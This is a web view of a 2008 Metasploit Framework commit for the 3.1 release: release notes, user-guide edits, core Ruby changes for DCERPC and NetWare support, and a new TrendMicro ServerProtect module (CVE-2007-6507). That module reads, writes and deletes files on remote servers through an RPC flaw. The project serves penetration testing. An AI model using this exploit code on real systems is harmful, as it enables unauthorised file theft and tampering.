infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merged revisions 5366-5377 via svnmerge from 

svn+ssh://metasploit.com/home/svn/framework3/branches/framework-3.1

........
  r5366 | hdm | 2008-01-26 20:30:53 -0600 (Sat, 26 Jan 2008) | 2 lines
  
  Update version information
........
  r5367 | hdm | 2008-01-26 21:10:57 -0600 (Sat, 26 Jan 2008) | 3 lines
  
  Updated for version 3.1
........
  r5369 | hdm | 2008-01-26 21:13:31 -0600 (Sat, 26 Jan 2008) | 3 lines
  
  Wipe the private directories from the branch. 
........
  r5371 | hdm | 2008-01-27 17:24:24 -0600 (Sun, 27 Jan 2008) | 5 lines
  
  Timeout options added for dcerpc connect and read times. Addition of novell netware as a supported target platform. Inclusion of the serverprotect exploit (still works on the latest version). Addition of the first remote netware kernel exploit that leads to a shell, addition of netware stager and shell, and first draft of the release notes for 3.1
........
  r5372 | hdm | 2008-01-27 17:30:08 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Formatting, indentation, fixed the static IP embedded in the request
........
  r5373 | hdm | 2008-01-27 20:02:48 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Correctly trap exploit errors in a way that works with all of the UIs
........
  r5374 | hdm | 2008-01-27 20:23:25 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  More last-minute bug fixes
........
  r5375 | hdm | 2008-01-27 20:37:43 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  Force multi-bind off in netware, correct label display in gtk gui labels
........
  r5376 | hdm | 2008-01-27 20:50:03 -0600 (Sun, 27 Jan 2008) | 3 lines
  
  More exception handling fun
........


git-svn-id: file:///home/svn/framework3/trunk@5378 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-01-28 03:06:31 +00:00
parent 63971bc6e2
commit 6677beb174
24 changed files with 1664 additions and 478 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

93
documentation/RELEASE-3.1.txt Normal file
View File

@ -0,0 +1,93 @@
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn
Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development,
integrating ideas and code from some of the sharpest and most innovative
folks in the security research community" said H D Moore, project
manager. Moore is referring the numerous research projects that have
lent code to the framework.
These projects include the METASM pure-ruby assembler developed by
Yoann Guillot and Julien Tinnes, the "Hacking the iPhone" effort
outlined in the Metasploit Blog, the Windows kernel-land payload
staging system developed by Matt Miller, the heapLib browser
exploitation library written by Alexander Sotirov, the Lorcon 802.11
raw transmit library created by Joshua Wright and Mike Kershaw, Scruby,
the Ruby port of Philippe Biondi's Scapy project, developed by Sylvain
Sarmejeanne, and a contextual encoding system for Metasploit payloads.
"Contextual encoding breaks most forms of shellcode analysis by
encoding a payload with a target-specific key" said I)ruid, author of
the Uninformed Journal (volume 9) article and developer of the
contextual encoding system included with Metasploit 3.1.
The graphical user interface is a major step forward for Metasploit
users on the Windows platform. Development of this interface was driven
by Fabrice Mourron and provides a wizard-based exploitation system, a
graphical file and process browser for the Meterpreter payloads, and a
multi-tab console interface. "The Metasploit GUI puts Windows users on
the same footing as those running Unix by giving them access to a
console interface to the framework" said H D Moore, who worked with
Fabrice on the GUI project.
The latest incarnation of the framework includes a bristling
arsenal of exploit modules that are sure to put a smile on the face of
every information warrior. Notable exploits in the 3.1 release include
a remote, unpatched kernel-land exploit for Novell Netware, written by
toto, a series of 802.11 fuzzing modules that can spray the local
airspace with malformed frames, taking out a wide swath of
wireless-enabled devices, and a battery of exploits targeted at
Borland's InterBase product line. "I found so many holes that I just
gave up releasing all of them", said Ramon de Carvalho, founder of RISE
Security, and Metasploit contributor.
The Metasploit Framework is used by network security professionals
to perform penetration tests, system administrators to verify patch
installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby
programming language and includes components written in C and assembler.
Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the Gtk GUI, the command line scripting
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools.
The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://metasploit3.com/
# # #
If you'd like more information about this topic, or to schedule an
interview with the developers, please email msfdev[at]metasploit.com

BIN
documentation/users_guide.pdf
View File

Binary file not shown.

110
documentation/users_guide.tex
View File

@ -23,7 +23,7 @@
\huge{Metasploit Framework User Guide}
\ \\[10mm]
\large{Version 3.0}
\large{Version 3.1}
\\[120mm]
\small{\url{http://www.metasploit.com/}}
@ -41,7 +41,7 @@
\chapter{Introduction}
\par
This is the official user guide for version 3.0 of the Metasploit Framework. This
This is the official user guide for version 3.1 of the Metasploit Framework. This
guide is designed to provide an overview of what the framework is, how it works,
and what you can do with it. The latest version of this document can be found
on the Metasploit Framework web site.
@ -63,7 +63,7 @@ Installing the Framework is as easy as extracting the tarball, changing into the
created directory, and executing your preferred user interface. We strongly
recommend that you use a version of the Ruby interpreter that was built with
support for the GNU Readline library. If you are using the Framework on Mac OS
X, you will need to install GNU Readline and then recompile the Ruby
X prior to 10.5.1, you will need to install GNU Readline and then recompile the Ruby
interpreter. Using a version of Ruby with Readline support enables tab completion
of the console interface. The \texttt{msfconsole} user interface is preferred for everyday
use, but the \texttt{msfweb} interface can be useful for live demonstrations.
@ -81,28 +81,21 @@ distribution.
\label{INSTALL-WIN32}
\par
The Metasploit Framework is only partially supported on the Windows platform. If you would like
to access most of the Framework features from Windows, we recommend using a virtualization environment,
such as VMWare, with a supported Linux distribution
\footnote{We highly recommend the BackTrack live CD, available from \url{http://www.remote-exploit.org/}}. If this is not possible, you can also use the
Framework from within Cygwin. To use the Framework from within Cygwin, follow the instructions for
installation on a Unix system. For more information on Cygwin, please see the Cygwin web site at
\url{http://www.cygwin.com/}
The Metasploit Framework is fully supported on the Windows platform. To install the Framework on Windows,
download the latest version of the Windows installer from \url{http://framework.metasploit.com/}, perform
an online update, and launch the \texttt{msfgui} interface from the Start Menu. To access a standard
\texttt{msfconsole} interface, select the Console option from the Window menu. As an alternative, you can
use the \texttt{msfweb} interface, which supports Mozilla Firefox and Internet Explorer.
To install the Framework on Windows, download the latest version of the Windows installer from
\url{http://framework.metasploit.com/}, perform an online update, and launch the \texttt{msfweb}
interface. Once \texttt{msfweb} is running, access the \url{http://127.0.0.1:55555/} URL from within
your browser. At this time, only Mozilla and Internet Explorer are fully supported.
\section{Platform Caveats}
\label{INSTALL-CAVEAT}
\par
When using the Framework on the Windows platform, keep in mind that \texttt{msfweb} is the only
supported user interface. While \texttt{msfconsole} and \texttt{msfcli} may appear to work, they
are severely limited by the way stdio operations are handled. The result is that all Ruby threads
will block when input is being read from the console. This can prevent most exploits, auxiliary modules,
and plugins from functioning. This problem does not occur within Cygwin.
When using the Framework on the Windows platform, keep in mind that \texttt{msfgui} and \texttt{msfweb} are the only
supported user interfaces. While \texttt{msfcli} may appear to work on the command line, it will will run into
trouble as soon as more than one active thread is present. This can prevent most exploits, auxiliary modules,
and plugins from functioning. This problem does not occur within Cygwin environment.
\section{Supported Operating Systems}
\label{INSTALL-SUPPORT}
@ -114,21 +107,25 @@ version of the Framework is tested with three primary platforms:
\begin{itemize}
\item Linux 2.6 (x86, ppc)
\item Windows NT (2000, XP, 2003)
\item MacOS X 10.4 (x86, ppc)
\item Windows NT (2000, XP, 2003, Vista)
\item MacOS X 10.4 (x86, ppc), 10.5 (x86)
\end{itemize}
\par
For information about manually installing the framework, including all of the required dependencies needed
to use the new \texttt{msfgui} interface, please see the framework web site: \url{http://framework.metasploit.com/msf/support}
\section{Updating the Framework}
\label{INSTALL-UPDATE}
\par
The Framework can be updated using a standard \texttt{Subversion} client. The
old \texttt{msfupdate} tool is no longer supported. To obtain the latest updates,
change into the Framework installation directory and execute \texttt{svn update}. If
you are accessing the internet through a HTTP proxy server, please see the
Subversion FAQ on proxy access: \url{http://subversion.tigris.org/faq.html#proxy}
If your version of Subversion does not support SSL, execute the following command
to switch to non-SSL HTTP:
old \texttt{msfupdate} tool is no longer supported. Windows users can click on
the Online Update link within the Metasploit 3 program folder on the Start Menu.
To obtain the latest updates on a Unix-like platform, change into the Framework
installation directory and execute \texttt{svn update}. If you are accessing the
internet through a HTTP proxy server, please see the Subversion FAQ on proxy
access: \url{http://subversion.tigris.org/faq.html#proxy}
\pagebreak
@ -140,8 +137,8 @@ to switch to non-SSL HTTP:
\par
After you have installed the Framework, you should verify that everything is
working properly The easiest way to do this is to execute the
\texttt{msfconsole} user interface. If you are using Windows, start the \texttt{msfweb}
interface and access the \texttt{Console} link from within your browser.
\texttt{msfconsole} user interface. If you are using Windows, start the \texttt{msfgui}
interface and access the \texttt{Console} link from the Window menu.
The console should display an ASCII art logo, print the current version, some module
counts, and drop to a "msf> " prompt. From this prompt, type \texttt{help} to get a list of
valid commands. You are currently in the "main" mode; this allows you to list
@ -166,6 +163,8 @@ The console startup will similar to the text below.
\begin{verbatim}
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
@ -177,14 +176,36 @@ ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.0-beta-dev
+ -- --=[ 179 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
=[ 29 aux
=[ msf v3.1-release
+ -- --=[ 263 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 45 aux
msf >
\end{verbatim}
\section{The GUI Interface}
\label{STARTED-GUI}
\par
The \texttt{msfgui} interface was introduced in version 3.1 and provides the functionality
of \texttt{msfconsole} in addition to many new features. To access a \texttt{msfconsole}
shell, select the Console option from the Window menu. To search for a module within the
module tree, enter a string or regular expression into the search box and click the button
labeled Find. All matching modules will appear the tree below. To execute a module,
double-click its name in the tree, or right-click its name and select the Execute option.
To view the source code of any module, right-click its name and select the View Code option.
\par
Once a module is selected, a wizard-based interface will walk you through the process of
configuring and launching the module. In the case of exploit modules, the output from
the module will appear in the main window under the Module Output tab. Any sessions created
by the module will appear in the Sessions view in the main window. To access a session,
double-click the session name in the view, or open a Console and use the \texttt{sessions}
command to interact with the shell. Metepreter sessions will spawn a shell when double-clicked,
but also offer a process and file browser via the right-click context menu.
\section{The Command Line Interface}
\label{STARTED-CLI}
@ -204,23 +225,15 @@ actions, C to try a vulnerability check, and E to exploit. The saved
datastore will be loaded and used at startup, allowing you to configure
convenient default options in the Global or module-specific datastore of
\texttt{msfconsole}, save them, and take advantage of them in the
\texttt{msfcli} interface.
\texttt{msfcli} interface. As of version 3.1, the \texttt{msfcli} interface
will also work with auxiliary modules.
\section{The Web Interface}
\label{STARTED-WEB}
\par
The \texttt{msfweb} interface is based on Ruby on Rails. To use this interface, you need to have
the \texttt{rubygems} package and the appropriate version of \texttt{rails} gem. Once
\texttt{rubygems} has been installed, you can get the correct version of \texttt{rails}
with the following command.\footnote{The Windows version already includes the \texttt{rubygems}
and the correct version of \texttt{rails}}
\begin{verbatim}
$ gem install -v1.2.2 rails
\end{verbatim}
Once \texttt{rails} is configured, execute \texttt{msfweb} to start up the server. The \texttt{msfweb}
The \texttt{msfweb} interface is based on Ruby on Rails. To access this interface,
execute \texttt{msfweb} to start up the server. The \texttt{msfweb}
interface uses the WEBrick web server to handle requests. By default, \texttt{msfweb} will listen
on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that
the service has started. To access the interface, open your browser to the appropriate URL
@ -512,7 +525,8 @@ Using the options supported by the \texttt{generate} command, different
formats of a payload can be generated. Some payloads will require options
which can be specified through the \texttt{-o} parameter. Additionally, a
format to convey the generated payload can be specified through the
\texttt{-t} parameter.
\texttt{-t} parameter. To save the resulting data to a local file, pass the
\texttt{-f} parameter followed by the output file name.
\begin{verbatim}
msf payload(shell_reverse_tcp) > set LHOST 1.2.3.4
@ -708,7 +722,7 @@ running with System privileges.
\par
If there is no interactive user logged into the system or the screen has been
locked, the command shell can be used to launch explorer.exe anyways. This can
result in some very confused users when the logon screen also has a start menu.
result in some very confused users when the logon screen also has a Start Menu.
If the interactive desktop is changed, either through someone logging into the
system or locking the screen, the VNC server will disconnect the client. Future
versions may attempt to follow a desktop switch.
@ -796,7 +810,7 @@ use a terminal emulator which limits the functionality available through
hostile escape sequences. Please see the Terminal Emulator Security Issues paper
below for more information on this topic:
\url{http://www.digitaldefense.net/labs/papers/Termulation.txt}
\url{http://marc.info/?l=bugtraq&m=104612710031920&q=p3}
\section{Web Interface}

12
lib/msf/base/simple/exploit.rb
View File

@ -56,6 +56,9 @@ module Exploit
#
def self.exploit_simple(exploit, opts)
# Trap and print errors here (makes them UI-independent)
begin
# Import options from the OptionStr or Option hash.
exploit._import_extra_options(opts)
@ -121,6 +124,15 @@ module Exploit
exploit.job_id = driver.job_id
return session
rescue ::Interrupt
raise $!
rescue ::Exception => e
exploit.print_error("Exploit failed: #{e}")
elog("Exploit failed: #{e}", 'core', LEV_0)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
return
end
end
#

24
lib/msf/core/exploit/dcerpc.rb
View File

@ -49,8 +49,13 @@ module Exploit::Remote::DCERPC
[
Opt::RHOST,
Opt::RPORT(135),
], Msf::Exploit::Remote::DCERPC
)
], Msf::Exploit::Remote::DCERPC)
register_advanced_options(
[
OptInt.new('DCERPC::ReadTimeout', [ true, 'The number of seconds to wait for DCERPC responses', 0] )
], Msf::Exploit::Remote::DCERPC)
end
def dcerpc_handle(uuid, version, protocol, opts)
@ -92,6 +97,10 @@ module Exploit::Remote::DCERPC
opts['smb_client'] = self.simple
end
opts['connect_timeout'] = (datastore['ConnectTimeout'] || 10).to_i
opts['read_timeout'] = (datastore['DCERPC::ReadTimeout'] || 10).to_i
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, self.sock, opts)
@ -100,16 +109,17 @@ module Exploit::Remote::DCERPC
end
end
def dcerpc_call(function, stub = '')
def dcerpc_call(function, stub = '', timeout=nil)
otimeout = dcerpc.options['read_timeout']
begin
dcerpc.options['read_timeout'] = timeout if timeout
dcerpc.call(function, stub)
rescue ::Rex::Proto::SMB::Exceptions::NoReply, Rex::Proto::DCERPC::Exceptions::NoResponse
print_status("The DCERPC service did not reply to our request")
return
rescue ::Exception
raise $!
# print_status("DCERPC Error: #{$!.class.to_s} - #{$!.backtrace.join(" - ")}")
# return
ensure
dcerpc.options['read_timeout'] = otimeout
end
end

10
lib/msf/core/exploit_driver.rb
View File

@ -111,6 +111,10 @@ class ExploitDriver
# - Cleans up the handler
#
def run
# Set up the run context
ctx = [ exploit, payload ]
# First thing's first -- validate the state. Make sure all requirement
# parameters are set, including those that are derived from the
# datastore.
@ -127,10 +131,6 @@ class ExploitDriver
# Default the session to nil
self.session = nil
# Set up the run context
ctx = [ exploit, payload ]
# If we are being instructed to run as a job then let's create that job
# like a good person.
if (use_job)
@ -198,7 +198,7 @@ protected
payload.stop_handler
exploit.cleanup
raise $!
return
end
end

2
lib/msf/core/framework.rb
View File

@ -15,7 +15,7 @@ class Framework
#
Major = 3
Minor = 2
Release = "-dev"
Release = "-release"
Version = "#{Major}.#{Minor}#{Release}"
Revision = "$Revision$"

8
lib/msf/core/module/platform.rb
View File

@ -288,6 +288,14 @@ class Msf::Module::Platform
end
end
#
# NetWare
#
class Netware < Msf::Module::Platform
Rank = 100
Alias = "netware"
end
#
# Linux
#

6
lib/msf/core/module_manager.rb
View File

@ -899,7 +899,7 @@ protected
# Load the file like it aint no thang
begin
if (!load(file))
elog("Failed to load from file #{file}.")
elog("Failed to load module from #{file}")
return false
end
rescue NameError
@ -917,6 +917,10 @@ protected
rescue LoadError
elog("LoadError: #{$!}.")
return false
rescue ::Exception => e
elog("Failed to load module from #{file}: #{e.class} #{e}")
self.module_failed[file] = e
return false
end
added = mod.constants - old_constants

1
lib/msf/core/payload.rb
View File

@ -24,6 +24,7 @@ class Payload < Msf::Module
require 'msf/core/payload/osx'
require 'msf/core/payload/solaris'
require 'msf/core/payload/windows'
require 'msf/core/payload/netware'
##
#

5
lib/msf/core/payload/generic.rb
View File

@ -227,11 +227,10 @@ protected
session,
payload_type)
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
if actual_payload.nil?
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform}/#{actual_arch}"
raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}"
else
dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2)
# Share our datastore with the actual payload so that it has the
# appropriate values to substitute ad so on.
self.actual_payload.share_datastore(self.datastore)

33
lib/msf/core/payload/netware.rb Normal file
View File

@ -0,0 +1,33 @@
require 'msf/core'
###
#
# This class is here to implement advanced features for netware-based
# payloads. NetWare payloads are expected to include this module if
# they want to support these features.
#
###
module Msf::Payload::Netware
def initialize(info = {})
ret = super(info)
end
#
# Returns a list of compatible encoders based on architecture
# fnstenv does not work on NetWare
#
def compatible_encoders
encoders = super()
encoders2 = []
encoders.each { |encname, encmod|
if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai'))
encoders2 << [ encname, encmod ]
end
}
return encoders2;
end
end

103
lib/msf/core/session/netware_console.rb Normal file
View File

@ -0,0 +1,103 @@
require 'msf/base'
module Msf
module Sessions
###
#
# This class provides basic interaction with a command shell on the remote
# endpoint. This session is initialized with a stream that will be used
# as the pipe for reading and writing the command shell.
#
###
class NetwareConsole
#
# This interface supports basic interaction.
#
include Msf::Session::Basic
#
# This interface supports interacting with a single command shell.
#
include Msf::Session::Provider::SingleCommandShell
#
# Returns the type of session.
#
def self.type
"shell"
end
#
# Returns the session description.
#
def desc
"NetWare Console"
end
#
# Calls the class method.
#
def type
self.class.type
end
#
# The shell will have been initialized by default.
#
def init_shell
return true
end
#
# Read from the command shell.
#
def read_shell(length = nil)
return rstream.read(length)
end
#
# Writes to the command shell.
#
def write_shell(buf)
rstream.write(buf)
end
#
# Closes the shell.
#
def close_shell()
rstream.close
end
def _stream_read_remote_write_local(stream)
buf = stream.get
bsize = 25 * 80 +8
while buf.length > 0
data = buf[0, bsize]
user_output.print("\e[24A")
for i in 0..24
user_output.print(data[8+i*80, 80] + "\n")
end
col = data[4, 2].unpack('v')[0]
line = 25-data[6, 2].unpack('v')[0]
user_output.print("\e[#{line}A")
user_output.print("\e[#{col}C")
if (buf.length == bsize)
buf = ''
else
buf = buf[bsize, buf.length]
end
end
end
end
end
end

6
lib/msf/ui/console/command_dispatcher/exploit.rb
View File

@ -124,8 +124,12 @@ class Exploit
'LocalInput' => driver.input,
'LocalOutput' => driver.output,
'RunAsJob' => jobify)
rescue
return false
rescue ::Interrupt
raise $!
rescue ::Exception => e
# All exceptions should be handled below this layer
nil
end
# If we were given a session, let's see what we can do with it

4
lib/msf/ui/gtk2/assistant/exploit.rb
View File

@ -525,7 +525,9 @@ module Msf
begin
@mydriver.run
rescue ::Exception => e
nil
@mydriver.exploit.print_error("Exploit failed: #{$!}")
elog("Exploit failed: #{$!}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
end
select(nil, nil, nil, 0.01)
@pipe.print_status("Exploit #{@mydriver.exploit.refname} completed.") if not @mydriver.use_job

2
lib/msf/ui/gtk2/assistant/types/bool.rb
View File

@ -29,7 +29,7 @@ module Msf
hbox = Gtk::HBox.new(false, 0)
self.pack_start(hbox, false, false, 0)
@checkbutton = Gtk::CheckButton.new(self.key)
@checkbutton = Gtk::CheckButton.new(self.key.gsub("_", "__"))
hbox.pack_start(@checkbutton, true, true, 0)
# Define the CheckButton state

55
lib/rex/proto/dcerpc/client.rb
View File

@ -18,7 +18,10 @@ require 'rex/proto/smb/exceptions'
self.options = {
'smb_user' => '',
'smb_pass' => '',
'smb_pipeio' => 'rw'
'smb_pipeio' => 'rw',
'smb_name' => nil,
'read_timeout' => 10,
'connect_timeout' => 5
}
self.options.merge!(useroptions)
@ -63,11 +66,7 @@ require 'rex/proto/smb/exceptions'
else
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
# don't support ncacn_ip_udp yet
## when 'ncacn_ip_udp'
## if self.socket.type? != 'udp'
## raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
## end
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
else
raise "Unsupported protocol : #{self.handle.protocol}"
end
@ -75,20 +74,34 @@ require 'rex/proto/smb/exceptions'
# Create the appropriate socket based on protocol
def socket_setup()
ctx = { 'Msf' => options['Msf'], 'MsfExploit' => options['MsfExploit'] }
ctx = { 'Msf' => self.options['Msf'], 'MsfExploit' => self.options['MsfExploit'] }
self.socket = case self.handle.protocol
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0], 'Context' => ctx)
when 'ncacn_np' then begin
socket = ''
when 'ncacn_ip_tcp'
Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => self.handle.options[0],
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
when 'ncacn_np'
begin
timeout(10) {
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445, 'Context' => ctx)
}
socket = Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => 445,
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
rescue Timeout::Error, Rex::ConnectionRefused
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139, 'Context' => ctx)
socket = Rex::Socket.create_tcp(
'PeerHost' => self.handle.address,
'PeerPort' => 139,
'Context' => ctx,
'Timeout' => self.options['connect_timeout']
)
end
socket
end
else nil
end
@ -107,8 +120,9 @@ require 'rex/proto/smb/exceptions'
end
smb.login('*SMBSERVER', self.options['smb_user'], self.options['smb_pass'])
smb.connect('IPC$')
smb.connect("\\\\#{self.handle.address}\\IPC$")
self.smb = smb
self.smb.read_timeout = self.options['read_timeout']
end
f = self.smb.create_pipe(self.handle.options[0])
@ -141,13 +155,13 @@ require 'rex/proto/smb/exceptions'
if self.socket.type? == 'tcp'
if self.options['segment_read']
while (true)
data = self.socket.get_once(rand(5)+5, 10)
data = self.socket.get_once(rand(5)+5, self.options['read_timeout'])
break if data == nil
break if ! data.length
raw_response << data
end
else
raw_response = self.socket.get_once(-1, 5)
raw_response = self.socket.get_once(-1, self.options['read_timeout'])
end
else
raw_response = self.socket.read(0xFFFFFFFF / 2 - 1) # read max data
@ -252,7 +266,7 @@ require 'rex/proto/smb/exceptions'
end
# Process a DCERPC response packet from a socket
def self.read_response (socket, timeout=5)
def self.read_response(socket, timeout=self.options['read_timeout'])
data = socket.get_once(-1, timeout)
@ -279,7 +293,8 @@ require 'rex/proto/smb/exceptions'
# Still missing some data...
if (data.length() != resp.frag_len - 10)
$stderr.puts "Truncated DCERPC response :-("
# TODO: Bubble this up somehow
# $stderr.puts "Truncated DCERPC response :-("
return resp
end

413
modules/auxiliary/admin/serverprotect/file.rb Normal file
View File

@ -0,0 +1,413 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Admin::Serverprotect::FileAccess < Msf::Auxiliary
include Exploit::Remote::DCERPC
include Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'TrendMicro ServerProtect File Access',
'Description' => %q{
This modules exploits a remote file access flaw in the ServerProtect Windows
Server RPC service. Please see the action list (or the help output) for more
information.
},
'DefaultOptions' =>
{
'DCERPC::ReadTimeout' => 300 # Long-running RPC calls
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-6507' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-077.html'],
],
'Actions' =>
[
[ 'delete' ],
[ 'download' ],
[ 'upload' ],
[ 'list' ]
]
))
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]
),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]
),
], self.class)
end
def check_option(name)
if(not datastore[name])
raise RuntimeError, "The #{name} parameter is required by this option"
end
end
def auxiliary_commands
{
"delete" => "Delete a file",
"download" => "Download a file",
"upload" => "Upload a file",
"list" => "List files (not recommended - will crash the driver)",
}
end
def run
case action.name
when 'download'
check_option('RPATH')
check_option('LPATH')
cmd_download(datastore['RPATH'], datastore['LPATH'])
when 'upload'
check_option('RPATH')
check_option('LPATH')
cmd_upload(datastore['RPATH'], datastore['LPATH'])
when 'delete'
check_option('RPATH')
cmd_delete(datastore['RPATH'])
when 'list'
check_option('RPATH')
cmd_list(datastore['RPATH'])
else
print_error("Unknown action #{action.name}")
end
end
def deunicode(str)
str.gsub(/\x00/, '').strip
end
#
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
#
def cmd_list(*args)
if (args.length < 1)
print_status("Usage: list folder")
return
end
file = Rex::Text.to_unicode(args[0])
data = "\0" * 0x100
data[4, file.length] = file
# FindFirstFile
resp = serverprotect_rpccmd(131080, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
return
end
ret, = resp[0x104,4].unpack('V')
if ret != 0
print_status("An error occurred while calling FindFirstFile #{args[0]}: #{ret}.")
return
end
handle, = resp[4,4].unpack('V')
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
data = "\0" * 0x100
data[0,4] = [handle].pack('V')
while true
# FindNextFile
resp = serverprotect_rpccmd(131081, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
break
end
ret, = resp[0x104,4].unpack('V')
if ret != 0
break
end
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
end
data = "\0" * 0x100
data = [handle].pack('V')
# FindClose
resp = serverprotect_rpccmd(131082, data, 0x100)
end
def cmd_delete(*args)
if (args.length == 0)
print_status("Usage: delete c:\\windows\\system.ini")
return
end
data = Rex::Text.to_unicode(args[0]+"\0")
resp = serverprotect_rpccmd(131077, data, 4)
return if not resp
if (resp.length == 12)
ret, = resp[8,4].unpack('V')
if ret == 0
print_status("File #{args[0]} successfuly deleted.")
else
print_status("An error occurred while deleting #{args[0]}: #{ret}.")
end
end
end
def cmd_download(*args)
if (args.length < 2)
print_status("Usage: download remote_file local_file")
return
end
# GENERIC_READ: 0x80000000
# FILE_SHARE_READ: 1
# OPEN_EXISTING: 3
# FILE_ATTRIBUTE_NORMAL: 0x80
handle = serverprotect_createfile(args[0], 0x80000000, 1, 3, 0x80)
if (not handle or handle == 0)
return
end
fd = File.new(args[1], "wb")
print_status("Downloading #{args[0]}...")
# reads 0x1000 bytes (hardcoded in the soft)
while ((data = serverprotect_readfile(handle)).length > 0)
fd.write(data)
end
fd.close
serverprotect_closehandle(handle)
print_status("File #{args[0]} successfuly downloaded.")
end
def cmd_upload(*args)
if (args.length < 2)
print_status("Usage: upload local_file remote_file")
return
end
# GENERIC_WRITE: 0x40000000
# FILE_SHARE_WRITE: 2
# CREATE_ALWAYS: 2
# FILE_ATTRIBUTE_NORMAL: 0x80
handle = serverprotect_createfile(args[1], 0x40000000, 2, 2, 0x80)
if (handle == 0)
return
end
fd = File.new(args[0], "rb")
print_status("Uploading #{args[1]}...")
# write 0x1000 bytes (hardcoded in the soft)
while ((data = fd.read(0x1000)) != nil)
serverprotect_writefile(handle, data)
end
fd.close
serverprotect_closehandle(handle)
print_status("File #{args[1]} successfuly uploaded.")
end
def serverprotect_createfile(file, desiredaccess, sharemode, creationdisposition, flags)
data = "\0" * 540
file = Rex::Text.to_unicode(file)
data[4, file.length] = file
data[524, 16] = [desiredaccess, sharemode, creationdisposition, flags].pack('VVVV')
resp = serverprotect_rpccmd(131073, data, 540)
return if not resp
if (resp.length < 548)
print_status("An unknown error occurred while calling CreateFile.")
return 0
else
handle, = resp[4,4].unpack('V')
ret, = resp[544,4].unpack('V')
if ret != 0
print_status("An error occured while calling CreateFile: #{ret}.")
return 0
else
return handle
end
end
end
def serverprotect_readfile(handle)
data = "\0" * 4104
data[0, 4] = [handle].pack('V')
resp = serverprotect_rpccmd(131075, data, 4104)
return if not resp
if (resp.length != 4112)
print_status("An unknown error occurred while calling ReadFile.")
return ''
else
ret, = resp[4108,4].unpack('V')
if ret != 0
print_status("An error occured while calling CreateFile: #{ret}.")
return ''
else
br, = resp[4104, 4].unpack('V')
return resp[8, br]
end
end
end
